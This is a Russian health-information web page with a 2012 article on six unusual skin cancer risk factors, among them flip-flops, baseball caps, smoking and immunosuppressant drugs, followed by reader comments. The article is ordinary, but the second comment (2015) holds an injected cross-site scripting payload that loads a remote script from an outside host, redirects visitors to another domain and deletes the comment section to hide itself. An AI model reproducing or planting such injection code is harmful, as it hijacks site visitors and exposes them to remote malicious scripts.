Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Необычные факторы риска р...  >>  Необычные факторы риска рака кожи
 
Обратная связь
 

Необычные факторы риска рака кожи

Размер шрифта
06 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Наступило лето, и все мы стараемся проводить больше времени на солнце. Однако ультрафиолетовое излучение в составе солнечных лучей является основной причиной рака кожи. Какие факторы повышают риск развития этого заболевания, и как сделать свой отдых безопасным?
рак кожи

  1. Вьетнамки

    Если носить вьетнамки на босу ногу и не использовать солнцезащитный крем, можно легко получить солнечный ожог. Кроме того, раздражение, трещины и ранки, которые появляются при ношении вьетнамок, способствуют развитию рака кожи. К сожалению, при профилактических осмотрах у врача стопы часто остаются без внимания.

    Что делать: Носить более закрытую обувь, использовать солнцезащитный крем и прикрывать ноги полотенцем, находясь на пляже.

  2. Бейсболка

    Как правило, бейсболку носят для того, чтобы защитить от солнца глаза и лицо, но в таком случае уши и шея остаются без защиты. Более того, многие из нас не наносят на уши солнцезащитный крем, а ведь именно там врачи часто обнаруживают одну из разновидностей рака кожи – базальноклеточную карциному.

    Что делать: Наносить солнцезащитный крем на уши и шею, использовать солнцезащитные очки и широкополые шляпы.

  3. Мужской пол

    Базальноклеточный рак кожи встречается у мужчин в два раза чаще, а плоскоклеточный – в три раза чаще, чем у женщин. Ученые полагают, что причина подобной закономерности кроется в комбинации гормональных, генетических факторов и образа жизни. Возможно, женщин защищает макияж и длинные волосы.

    Что делать: Многие мужчины не любят пользоваться солнцезащитным кремом. В таком случае следует подумать о применении солнцезащитных средств в виде спрея.

  4. Темная кожа

    Люди с темной кожей лучше защищены от воздействия ультрафиолетового излучения в связи с высоким содержанием пигмента меланина. Поэтому они менее подвержены риску развития рака кожи. Однако этот известный факт дает людям с темной кожей чувство ложной защищенности, и они забывают о необходимости использования солнцезащитного крема.

    Что делать: Пользоваться солнцезащитным кремом и регулярно проводить осмотр незащищенных участков: ладоней, подошв, пальцев и ногтей.

  5. Курение

    Курение оказывает негативное влияние не только на легкие, но и на другие органы. Согласно данным исследования 2011 года, у курящих женщин повышен риск развития базальноклеточной карциномы.

    По всей видимости, это связано с влиянием эстрогена на превращение никотина в организме женщины. Чем больше стаж курения, тем выше риск развития рака кожи – это справедливо как для мужчин, так и для женщин.

    Что делать: Бросить курить, что позволит снизить риск развития рака любой локализации. 

  6. Препараты, угнетающие иммунитет 

    Препараты, угнетающие иммунитет, используются для лечения аутоиммунных заболеваний, а также после пересадки органов. Согласно данным исследования 2011 года, ингибиторы фактора некроза опухолей, которые применяются для лечения ревматоидного артрита, увеличивают риск развития базальноклеточного и плоскоклеточного рака. В 2005 году ученые установили, что у пациентов, перенесших пересадку почки, повышен риск развития меланомы.

    Что делать: Использовать солнцезащитный крем как на солнце, так и в тени.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

14 июля 2012 в 11:22

Цитировать   |   Пожаловаться

про вьетнамки очень интересный факт. буду мазать ноги кремом теперь)

2 - zzzzzz

30 июня 2015 в 23:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Голубоглазые красавцы в опасности!   Как заботиться о коже зимой?   Дед Мороз – красный нос: не от холода, а от бактерий   Солнечные ожоги снижают риск рака кожи  
28 декабря 2012Дед Мороз – красный нос: не от холода, а от бактерий 02 августа 2011Виноград защищает от ультрафиолета
 
11 сентября 2012Солнечные ожоги снижают риск рака кожи! 19 октября 2011Парикмахер – союзник против рака
 

Слайдшоу

1
Вы неправильно мажете крем
Сохраните вашу кожу
10 способов изуродовать свою кожу

Тесты

1
Профессиональный оценщик кожи
Как выявить контактный дерматит?
Советы по уходу за кожей
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.